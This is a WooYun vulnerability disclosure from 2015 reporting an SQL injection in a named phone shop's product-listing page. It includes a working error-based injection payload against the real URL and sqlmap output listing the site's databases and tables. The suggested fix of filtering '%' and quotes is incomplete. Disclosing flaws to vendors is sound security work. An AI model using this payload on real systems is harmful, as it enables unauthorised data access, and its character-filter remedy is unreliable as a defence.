当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104289

漏洞标题:丫丫手机商城sql注入一枚

相关厂商:yaya888.com

漏洞作者: 风之传说

提交时间:2015-03-30 12:49

修复时间:2015-05-14 12:58

公开时间:2015-05-14 12:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经确认,细节仅向厂商公开
2015-04-09: 细节向核心白帽子及相关领域专家公开
2015-04-19: 细节向普通白帽子公开
2015-04-29: 细节向实习白帽子公开
2015-05-14: 细节向公众公开

简要描述:

丫丫手机商城sql注入一枚

详细说明:

http://mtest.yaya888.com/list.php?cat=1&id=62&f2=&f3=%E7%BF%BB%E7%9B%96&f4=%E5%85%A8%E9%94%AE%E7%9B%98&f5=%E6%97%A0%E6%91%84%E5%83%8F%E5%A4%B4&f6=IOS&price=1000-1499&f8=500%E4%B8%87%E5%83%8F%E7%B4%A0%E5%8F%8A%E4%BB%A5%E4%B8%8A&f9=2.1-3.0%E8%8B%B1%E5%AF%B8


搜索型sql注入一枚,存在注入的参数 f2=

Place: URI
Parameter: #1*
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://mtest.yaya888.com:80/list.php?cat=1&id=62&f2=%' AND (SELECT
1417 FROM(SELECT COUNT(*),CONCAT(0x7170767171,(SELECT (CASE WHEN (1417=1417) THE
N 1 ELSE 0 END)),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACT
ER_SETS GROUP BY x)a) and '%'='&f3=%E7%BF%BB%E7%9B%96&f4=%E5%85%A8%E9%94%AE%E7%9
B%98&f5=%E6%97%A0%E6%91%84%E5%83%8F%E5%A4%B4&f6=IOS&price=1000-1499&f8=500%E4%B8
%87%E5%83%8F%E7%B4%A0%E5%8F%8A%E4%BB%A5%E4%B8%8A&f9=2.1-3.0%E8%8B%B1%E5%AF%B8
---
[21:20:15] [INFO] testing MySQL
[21:20:15] [WARNING] reflective value(s) found and filtering out
[21:20:15] [INFO] confirming MySQL
[21:20:15] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, PHP 5.2.8
back-end DBMS: MySQL >= 5.0.0
[21:20:15] [INFO] fetching current user
[21:20:15] [INFO] retrieved: yaya_cdb_pc@%
current user:    'yaya_cdb_pc@%'


available databases [10]:
[*] baobao
[*] information_schema
[*] kmyaya
[*] kmyaya6
[*] kmyaya_bak
[*] kmyaya_bak2
[*] kmyaya_bak3
[*] mysql
[*] test
[*] yaya_appapi


看下是不是你们的数据库。。

Database: kmyaya6
[98 tables]
+------------------------+
| coupon_con             |
| coupon_stuff           |
| coupon_verify          |
| coupon_visits          |
| game_cd_gift           |
| game_cd_user           |
| game_zhuanpan_gift     |
| game_zhuanpan_gift_bak |
| game_zhuanpan_open     |
| game_zhuanpan_open_bak |
| game_zhuanpan_pici     |
| game_zhuanpan_user     |
| game_zhuanpan_user_bak |
| lottery                |
| lottery_activity       |
| lottery_log            |
| oa_active_log          |
| oa_active_order        |
| oa_article             |
| oa_backvisit           |
| oa_computer            |
| oa_customer            |
| oa_customer_log        |
| oa_customer_score_log  |
| oa_document            |
| oa_ip                  |
| oa_iplogin             |
| oa_modlist             |
| oa_money_class         |
| oa_money_detail        |
| oa_offer_code          |
| oa_offer_event         |
| oa_offer_task          |
| oa_personnel_files     |
| oa_qwgh                |
| oa_reset               |
| oa_service             |
| oa_set_depart          |
| oa_set_member_rank     |
| oa_set_parameter       |
| oa_set_shop            |
| oa_stock               |
| oa_stock_archive       |
| oa_stock_booking       |
| oa_stock_detail        |
| oa_stock_inventory     |
| oa_stock_move          |
| oa_url                 |
| oa_user                |
| oa_user_log            |
| oa_user_login          |
| oa_usergroup           |
| oa_wx_status           |
| sms_sended             |
| sms_sending            |
| sms_tpl                |
| sms_user               |
| sys_actgoods           |
| sys_ad                 |
| sys_ad_position        |
| sys_address            |
| sys_admin              |
| sys_admin_log          |
| sys_admin_login        |
| sys_ads                |
| sys_advertisement      |
| sys_app_fenlei         |
| sys_article            |
| sys_article_cat        |
| sys_bai_nian           |
| sys_brand              |
| sys_brands             |
| sys_byself             |
| sys_cart               |
| sys_cart_detail        |
| sys_client_company     |
| sys_client_phone       |
| sys_client_question    |
| sys_client_records     |
| sys_codesend           |
| sys_comment            |
| sys_contract           |
| sys_contract_a         |
| sys_contract_config    |
| sys_cprice             |
| sys_cup_comment        |
| sys_cup_match          |
| sys_cup_taking         |
| sys_district           |
| sys_friend_link        |
| sys_friendlink         |
| sys_game_batch         |
| sys_game_gift          |
| sys_game_open          |
| sys_game_order         |
| sys_game_type          |
| sys_game_user          |
| sys_goods              |
+------------------------+


看下是不是你么的表。。。

漏洞证明:

如上

修复方案:

过滤 % 和 ' 就可以了。。

版权声明:转载请注明来源 风之传说@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-30 12:57

厂商回复:

非常谢谢

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-30 12:54 | 小鲜肉 ( 实习白帽子 | Rank:34 漏洞数:6 | 努力学习,不想在浪费时间了。)

    这么大的厂商都不走前台? 没有出数据?

  2. 2015-03-30 12:54 | 小鲜肉 ( 实习白帽子 | Rank:34 漏洞数:6 | 努力学习,不想在浪费时间了。)

    。。看错了。我以为多玩YY的。逗我。。

  3. 2015-03-30 15:17 | 风之传说 ( 普通白帽子 | Rank:138 漏洞数:28 | 借用朋友的一句话,你的时间在哪里,你的成...)

    @yaya888.com 我后来测了下 f2 到 f9 都存在漏洞。。不要漏补了。。